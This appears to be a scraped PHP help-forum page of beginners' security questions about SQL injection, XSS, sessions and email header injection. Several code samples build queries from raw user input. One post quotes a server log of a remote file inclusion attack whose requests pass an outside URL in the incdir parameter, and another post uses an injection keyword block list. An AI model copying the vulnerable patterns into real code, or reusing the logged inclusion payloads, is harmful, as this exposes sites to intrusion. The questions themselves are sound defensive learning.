|
PHP - Question Mysql Security.... Is This Function Practical, Safe Enough?
Hello, all: I'm a newbie and I'm trying to understand the whole php security thing a bit better, and found this function that seems easy to implement, as well as easy to understand... my question is...
Does this means I could use regular $_POST, $_GET, $_COOKIE, $_REQUEST variables without having to individually worry about escaping them every time I use them in queries... is this correct? or safe enough? see example below, along with how I'm using variable in a query... it seems to be working fine, as it does echo out the \ escape character when I test it, or when I try to inject it... Appreciate your input! Code: [Select] <?php $_POST=sanitize($_POST); $_GET=sanitize($_GET); $_COOKIE=sanitize($_COOKIE); $_REQUEST=sanitize($_REQUEST); function sanitize($input){ if(is_array($input)){ foreach($input as $k=>$i){ $output[$k]=sanitize($i); } } else{ if(get_magic_quotes_gpc()){ $input=stripslashes($input); } $output=mysql_real_escape_string($input); } return $output; } // mysql query then I could use be: $money = $_GET['money']; $result = mysql_query("SELECT * FROM countries WHERE currencies = '$money'"); ?> Similar TutorialsHello, I am slightly nervous about posting this because I am almost completely new to php, I have a few introductory books on the subject which I am working through at the moment as well as some reference books but I am still getting through the basics of it all. I recently downloaded a login script, which allows a user to login and also allows the protection of some pages if users are not logged in. This script was a free one from easykiss123. it comes with other .php files and I have given them all a look over and I get the general idea of what's going on for the most part, and I THINK as I keep reading my books I will understand everything even more. However, what I really want to do right now is make it so a website would know which user is logged on, and then use this information elsewhere. For example if a particular user logged on and submitted something, I would like obviously the submission to be recorded but also the id of the user that submitted it, at the moment with this code, I do not think that is possible, however I could be wrong. I am looking for any pointers or a nudge in the right direction or link to a tutorial of how I would go about this, anything that may help. I think I would be storing the user ID in a global variable that can be used throughout the site, but again I am not sure. Thanks in advance for any help, I have included both the login script and the script used for protecting pages, as its already freely available online I see no issue with posting snippits of it here since the source has been referenced. Code: [Select] <?php # Script 16.8 - login.php // This is the login page for the site. require_once ('includes/config.inc.php'); $page_title = 'Login'; include ('includes/header.html'); if (isset($_POST['submitted'])) { require_once (MYSQL); // Validate the email address: if (!empty($_POST['email'])) { $e = mysqli_real_escape_string ($dbc, $_POST['email']); } else { $e = FALSE; echo '<p class="error">You forgot to enter your email address!</p>'; } // Validate the password: if (!empty($_POST['pass'])) { $p = mysqli_real_escape_string ($dbc, $_POST['pass']); } else { $p = FALSE; echo '<p class="error">You forgot to enter your password!</p>'; } if ($e && $p) { // If everything's OK. // Query the database: $q = "SELECT user_id, first_name, user_level FROM users WHERE (email='$e' AND pass=SHA1('$p')) AND active IS NULL"; $r = mysqli_query ($dbc, $q) or trigger_error("Query: $q\n<br />MySQL Error: " . mysqli_error($dbc)); if (@mysqli_num_rows($r) == 1) { // A match was made. // Register the values & redirect: $_SESSION = mysqli_fetch_array ($r, MYSQLI_ASSOC); mysqli_free_result($r); mysqli_close($dbc); $url = BASE_URL . 'index.php'; // Define the URL: ob_end_clean(); // Delete the buffer. header("Location: $url"); exit(); // Quit the script. } else { // No match was made. echo '<p class="error">Either the email address and password entered do not match those on file or you have not yet activated your account.</p>'; } } else { // If everything wasn't OK. echo '<p class="error">Please try again.</p>'; } mysqli_close($dbc); } // End of SUBMIT conditional. ?> <h1>Login</h1> <p>Your browser must allow cookies in order to log in.</p> <form action="login.php" method="post"> <fieldset> <p><b>Email Address:</b> <input type="text" name="email" size="20" maxlength="40" /></p> <p><b>Password:</b> <input type="password" name="pass" size="20" maxlength="20" /></p> <div align="center"><input type="submit" name="submit" value="Login" /></div> <input type="hidden" name="submitted" value="TRUE" /> </fieldset> </form> <?php // Include the HTML footer. include ('includes/footer.html'); ?> Code: [Select] <?php require_once ('includes/config.inc.php'); $page_title = 'YOUR PAGE TITLE GOES HERE'; // Start output buffering: ob_start(); // Initialize a session: session_start(); // Check for a $page_title value: if (!isset($page_title)) { $page_title = 'User Registration'; } // If no first_name session variable exists, redirect the user: if (!isset($_SESSION['first_name'])) { $url = BASE_URL . 'index.php'; // Define the URL. ob_end_clean(); // Delete the buffer. header("Location: $url"); exit(); // Quit the script. } ?> Code: [Select] <?php // Flush the buffered output. ob_end_flush(); ?> is this select query code safe from injection?
try {
$stmt = $db->prepare("SELECT * FROM posts WHERE key=$key");
$stmt->execute();
$row = $stmt->fetch();
}
notice there is no bind.
$stmt->bindParam(':key', $key);
the reason i am asking is that i have many $key variable in the query and i do not know how to use bind in a query such as this...
SELECT count(*) FROM posts WHERE MATCH (file) AGAINST
('$key' IN BOOLEAN MODE) OR MATCH (user) AGAINST ('$key' IN BOOLEAN MODE)
the $key is not an array and the $key does not change it's value.
Edited by kalster, 04 January 2015 - 05:52 PM. Hi, My ISP doesn't allow direct access to mysql Server so I created a bridge and stored the PHP code in the main web folder (https://www.mydomain.com/post.php). The bridge works fine and is used mainly for my IOT projects. In the same web folder, is located the conn.php code containing the server's credentials. The question is, how safe is the PHP code at that location? I can create a subfolder but not sure if it matters as far as security is concerned. TIA Hey people, I was going over an old script of mine the other day and I ran I web vulnerability scanner on it to see how secure it was and I got an XSS warning, now this puzzles me because I am not entirely sure how this affects the script and what can/can't be done, this script is old so I will paste the relevant bits in here, it was playing with the $page variable. What damage could you do and how would you remedy the problem? Code: [Select] if(isset($_GET['page'])) { if($_GET['page'] > $numpages) { $page = 1; } else { $page = $_GET['page']; } } else { $page = 1; } echo ('<strong style="margin-top: 4px; margin-left: 3px;">Page ' . $page . ' of ' . $numpages . '</strong></p>'); By putting a non-number in there like hello.php?page=Hello, it simply output the word hello so I am not fully sure what the security implications are and how insecure it really is. Might sound like a dumb question but it's been nagging at me. Thanks for reading! Hi everyone! I have a question that might sound silly... I have stored in my database a url to a pic and some other data. I am unsure if when I retreive data from my database I need some sort of protection. I usually sanitize and prevent SQl injections when I code forms but I am not sure if I have to do the same when I get data from the database. Thanks for your help. Veronica If i have a page that requires people to be loged in to view it. and If that page requirs a function page (with only php code on it) does that function page need to have the same safe file on it to keep people from going straight to that function page? or would it not matter I have a form that when submitted inserts the input values into a database. I was wondering what measures I can take to make sure that it is as secure a possible. Below I have added some basic code. Any help on how to modify this code to protect against injection attacks etc would be great. if(isset($_POST['form_submit'])) { $submit_sql = "insert into websites (website_name, website_description,website_url) values (\"" . $_POST['website_name'] . "\",\"" . $_POST['website_description'] . "\",\"" . $_POST['website_url'] . "\")"; $submit_rs = mysql_query($submit_sql, $mysql_conn); } HI all, I have a book with some nice examples, but often i wonder if they are that secure for displaying and using outside the production area. One of them is this. A form is created by using a while loop that gets data(email addresses) from a database and shows them with check boxes. after that someone can select the e-mailaddress they don't like and delete them from the database. here is some code: <?php //.... $result = mysqli_query($dbc,$query); while ($row = mysqli_fetch_array($result)){ echo '<input type="checkbox" value"'.$row['id'].'"name="todelete[]"/>'; echo $row['firstname']; } //.........deleting part if (isset($_POST['submit'])){ foreach($_POST['todelete'] as $delete_id){ $query = "DELETE FROM email_list WHERE ID = $delete_id"; mysqli_query ($dbc, $query) or die ('error querying databse'); } } //.... ?> I have two questions: -> is this a smart way of deleting stuff? since you are going to use multiple queries instead of 1 in the for each loop. -> besides not using mysqli_real_escape_string, isn't this application allowing someone to alter the POST-array (todelete) to any value he likes? At least that's what i think can happen. If anyone knows a nice way to do this more secure , I would love to here it, because i don't really trust the html array created. Thanks in advance! I have a business social network site on hosting server. I am wondering if sessions are enough secure. ini_set('session.use_only_cookies', 1); //this prevent Session Fixation? session_start(); if($_SESSION['loggedIn'] && $_SESSION['userIP']==$_SERVER["REMOTE_ADDR"]) // extra security //user is logged in, assign all data to this profile from session else //user is not logged in, no data are assigned Would you consider that as enough secure? Apologies for the lame subject title - I don't know what to call this thread. Last year, before I'd ever opened a book on php, my site was hacked. I was using a third party e-commerce script 'Cart Keeper' (since replaced). Somehow, the hackers planted some files on my server that looked like official bank pages (I'm sure you've all seen the sort of thing). Here are some log files sent by my host at that time... Quote "GET //ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 311 "-" "libwww-perl/5.805" www.example.com 89.38.128.43 - - [19/Jun/2009:11:58:48 +0100] "GET //ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 311 "-" "libwww-perl/5.65" www.example.com 89.38.128.43 - - [19/Jun/2009:11:58:49 +0100] "GET //ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 311 "-" "libwww-perl/5.65" www.example.com 89.38.128.43 - - [19/Jun/2009:11:59:24 +0100] "GET /arts//ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 302 313 "-" "libwww-perl/5.65" www.example.com 66.249.134.74 - - [19/Jun/2009:12:01:26 +0100] "GET //ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 311 "-" "libwww-perl/5.805" www.example.com 66.249.134.74 - - [19/Jun/2009:12:01:28 +0100] "GET //ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 311 "-" "libwww-perl/5.805" www.example.com 66.249.134.74 - - [19/Jun/2009:12:01:32 +0100] "GET /ckshop.php?category=21//ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 42 "-" "libwww-perl/5.805" www.example.com 89.38.128.43 - - [19/Jun/2009:12:01:47 +0100] "GET /ckshop.php//ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 311 "-" "libwww-perl/5.65" www.example.com 89.38.128.43 - - [19/Jun/2009:12:01:48 +0100] "GET /ckshop.php//ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 311 "-" "libwww-perl/5.65" www.example.com 89.38.128.43 - - [19/Jun/2009:12:01:49 +0100] "GET /ckshop.php?category=21//ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 42 "-" "libwww-perl/5.65" www.example.com 89.38.128.43 - - [19/Jun/2009:11:58:52 +0100] "GET //ckshop.php?incdir=http://racrew.us/ec.txt?? HTTP/1.1" 200 357 "-" "libwww-perl/5.65" and here is what they wrote to me at the time... Quote The majority of these files where then caught by our egress firewall as they had completed as the file in question had allowed the http user to call a shell and use a variety of code (wget lwp et al) to call in external toolkits. This attack was mostly mechanised, however was changing so it is my belief that the perpetrator was reconfiguring the attack as he went as failures where seen. Please check your site code for possible updates, security updates, and ensure that no files have been changed that should not have been. Please confirm that you have read this mail and are aware of the implications / taking action. Can someone identify the name of this type of attack? ...and possibly a tutorial on securing against this form of attack? As I am learning php, I would like to make sure it doesn't happen again. Many thanks for your help Im making a map atm which will have tokens"not sure what you call them" in the link like map.php?id=token Well I dont want a 3rd party coming along in the future and making their own map using my y and x cords. So I was thinking maybe the best way around this is to use a encryption in the link? so encrypting the x and y cords in the link. Anyone have any ideas on this. Also I was wondering is it impossible for php to know when somone clicks a link? I was googling around and it doesnt seem like you cant simply use a $_POST for a link I have a php page that processes a form. How do I prevent someone from making their own form on their own domain and then saying <form metod=post action = "www.hackerdomain.com/bad.php"> and then passing their own variables? Do I set up a $session variable on my form page and assign it to $_SERVER["PHP_SELF"]? Hi all, I have heard stories that hackers/viruses or basically something that you don't want uploaded to a server through a website form have been able to type some sort of code in to a html form field to access information. I know how to control the length of fields, how to validate that an email address is in the correct format etc. - but when it comes to having a textfield for the user to add up to 2000 characters of their own words, how can I protect from malicious code being inserted? The textfield is located inside the user area but anyone can join, so anyone ultimately can enter code! Thanks for the help. Hi Guys I have built a simple form, which has text fields Name, Telephone Number, Best Time to Call and E-mail. For security purposes, I am testing each against the function shown below which looks for dangerous code snippets, in an effort to protect against email header injection attacks. When it comes to the E-mail field, I am not actually testing whether a valid e-mail address has been entered, as it is the telephone number which is essential, not the e-mail. My question is, do you think this is a security weakness? Many thanks Code: [Select] //http://www.tonyspencer.com/2005/12/15/email-injection-exploit-through-a-php-contact-form/ //preg_match string to match goes within forward slashes, i.e. /str/, and i at the end makes it case insensitive function containsInjectionAttempt($input) { if (preg_match("/\r/i", $input) || preg_match("/\n/i", $input) || preg_match("/%0a/i", $input) || preg_match("/%0d/i", $input) || preg_match("/Content-Type:/i", $input) || preg_match("/<script>/i", $input) || preg_match("/bcc:/i", $input) || preg_match("/to:/i", $input) || preg_match("/cc:/i", $input)) { return true; } else { return false; } } I am trying to keep the user input clean with this script but can't figure out what is wrong with it. the error I am getting is Warning: preg_match() expects parameter 1 to be string, $bad_strings = array( "content-type:", "mime-version:", "multipart/mixed", "Content-Transfer-Encoding:", "bcc:", "cc:", "to:", ); if (preg_match($bad_strings, $first_name)) { die; I have a login system that uses a flat file database. The flat file is in a directory outside the public_html. My questions; 1- Is is still possible to hack into that file? Currently I do not encrypt the passwords as I have been told that having the file outside the public_html makes the file unavailable to the public. This allows me the advantage of sending the Username and Password to the user in an email if they forget there password or username. Otherwise- I would have to set up a more complicated method to allow them to change their password to re-gain access to the site. I have an SSL on the site also so I am not worried about packet sniffing. Thanks I must confess, I've not really done much unit testing at all in the last 3 years. Can anyone give me an idea of what they would test and why that would be faster or more efficient than running the code as a user? One area I can see it having huge benefits is when I'm testing methods which interact with a database, like user registration, which I would probably test by registering several times - fixing any bugs, making amendments and repeating. Ok, so I kinda sold the idea to myself there But, what about for small applications? I've seen people testing whether a variable is countable...why would I not just check the output immediately? Appreciate any advice. Code: [Select] $stick_topic = isset($_POST['stick_topic']) ? '1' : '0'; does this need to be escaped while entering the database or no because the values could only be 1 or 0 ? srry it's just i got hacked so i am trying to do my security #1 using this below is it safe against hackers? Code: [Select] $post_id = intval($_GET['report']); if ($post_id < 1) message($lang_common['Bad request']); query: Code: [Select] $result = $db->query('SELECT subject, forum_id FROM '.$db->prefix.'topics WHERE id='.$topic_id) or error('Unable to fetch topic info', __FILE__, __LINE__, $db->error()); should i escape my $topic_id ? Hello all. Just wanted to run this past you guys to see if I am missing anything important. I am making a script that I plan to allow a lot of other people around the web to use, so I want to make sure it's as bullet proof as possible. I am passing two values and grabbing them with a _GET, one is a big number, and the other is only letters and 8 characters long. her's my code so far. Code: [Select] <?php $clan = $_GET['clanid']; // make sure its an INT //if(isint($clan)){ if(ereg("[^0-9]", $clan)){ //im an int. echo ("ERROR Invalid CLANID"); die; } // make sure its a 8 letter only word. $style=$_GET['style']; // cut style down to 8 characters long. $style=substr($style, 0, 8); if(ereg("[^a-zA-Z]+", $style)) { // Contains only letters. echo("ERROR Invalid STYLE NAME"); die; } ?> to my noob php eye's it looks pretty solid, I cant think of any way a malicious user could get past it, but like I said, thought I would run it past you guys first , you can never be to careful. |
|||||||